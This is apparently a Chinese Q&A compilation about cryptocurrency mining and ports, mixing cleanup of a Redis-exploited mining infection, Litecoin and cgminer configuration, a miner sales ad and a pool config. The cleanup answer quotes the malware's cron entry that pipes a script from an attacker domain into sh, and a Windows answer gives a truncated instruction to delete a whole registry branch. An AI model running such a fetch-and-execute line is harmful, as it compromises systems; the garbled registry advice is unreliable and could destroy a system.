挖礦443埠
Ⅰ 如何用Linux伺服器挖礦教程
今天早上起來一看,伺服器腳本一個都沒有啟動!甚是奇怪,遠程登錄伺服器,也是異常的卡,直到最後卡死,只好重新啟動伺服器!
啟動之後沒一會又會變卡,越來越卡,top查看進程!不覺又奇怪的進程,因為平常也不經常看!所以自己也搞不明白怎麼回事兒!只好到群里問了問,說是被挖礦的掛了木馬文件了,是由於redis的漏洞!
後來我自己發現,原來redis遠程可以直接登錄,原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢,看來是我想多了
看了好長時間才發現一個異常的進程,自啟的進程 molibe !
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下,打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下,cat root 查看定時器的執行發現之前腳本都被改了,顧不得刪除cron,service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了!但是根本是因為redis漏洞,所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)
Ⅱ 伺服器445埠關閉對網站是否有什麼影響
對網站沒有什麼影響的,關閉一些高危埠對伺服器的安全性是非常的有必要的。
Ⅲ 萊特幣怎麼設置solo挖礦
(1)下載錢包軟體,安裝,同步數據完成後,關閉錢包軟體;
(2)點系統 「開始」,「運行」,在裡面輸入 %appdata% 然後點確定(win XP和win7系統都是這樣操作),或者同時按鍵盤 「win」鍵和 「R」鍵也可以打開運行界面。
(3)第二步點確定後,打開一個文件管理器,出來如下圖所示的界面。在裡面找到以貨幣名命名的文件夾,Litecoin,錢包軟體對應的數據全在這個文件夾裡面,雙擊打開這個文件夾。
(4)配置.conf文件
在開始,運行裡面輸入 notepad 確認,打開 記事本軟體,在裡面輸入如下內容:(把下面的代碼直接復制過去即可)
rpcuser=test
rpcpassword=test
rpcport=11095
daemon=1
server=1
gen=0
testnet=0
listen=0
maxconnections=100
rpcallowip=10.255.16.*
rpcuser、rpcpassword和rpcport你可以修改,也可以不改,rpcallowip需要根據你自己的情況進行修改。如果你的礦機和錢包軟體在同一台機器,則刪除rpcallowip這一行就可以了。
文件改好後,以Litecoin.conf為文件名保存到剛才的Litecoin目錄裡面,或者保存到桌面,再復制過去也可以。
以挖礦軟體cgminer為例,修改cgminer.conf文件中的pools部分
url部分的IP地址為你錢包所在機器的IP地址,埠11095就是剛才在Litecoin.conf裡面配置的埠,user和pass也是一樣,和上面的配置文件保持一致即可。
另外建議修改另外兩個參數的值如下:
"queue" : "0",
"scan-time" : "1",
設置完成,運行cgminer開始挖礦。。。。
Ⅳ 路由器怎麼修改埠挖礦
進入路由器,有一個外部互聯,裡面有修改Web埠的選項,希望盡量不要改,因為好多數據接收是默認的埠,改過以後可能出現連接不上的問題。
Ⅳ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
Ⅵ 挖礦病毒怎麼排查
登錄系統查看任務管理器,查看佔用內存較大且無法關閉的進程。進程上點擊滑鼠右鍵,打開文件位置(先要在文件夾選項中選擇顯示隱藏文件及操作系文件)。此時你可能會看到有一個Systmss.exe進程和模仿操作系統的svchost.exe進程這里還可以看到一個2.bat文件,右鍵編輯打開這個文件查看,可查看到惡意進程與哪個挖礦組織通信。
通過查看系統操作日誌可分析出病毒的來源、啟動時間等信息,一般原因可能是未關閉3389埠且使用了弱密碼導致黑客遠程登錄上次病毒。
根除病毒:將病毒可執行文件Systmss.exe重命名為Systmss.exe1使病毒無法執行,此時可從任務管理器停止進程。打開注冊表編輯器刪除HKEY_LOCAL_整個目錄。
如果是Linux系統請參考:網頁鏈接
Ⅶ 想做挖礦應該注意些什麼
首先要有質量過關的礦機 今日礦工多種優質礦機 售後周到 專業技術問題解答清晰
Ⅷ deepbit的挖礦埠是多少
{
"balance_host": "deepbit.net",
"balance_token_url": "http://deepbit.net/settings/",
"balance_url": "/api/%s",
"host": "pit.deepbit.net",
"name": "deepbit",
"port": 8332,
"url": "http://deepbit.net"
},
也就是說埠是:8332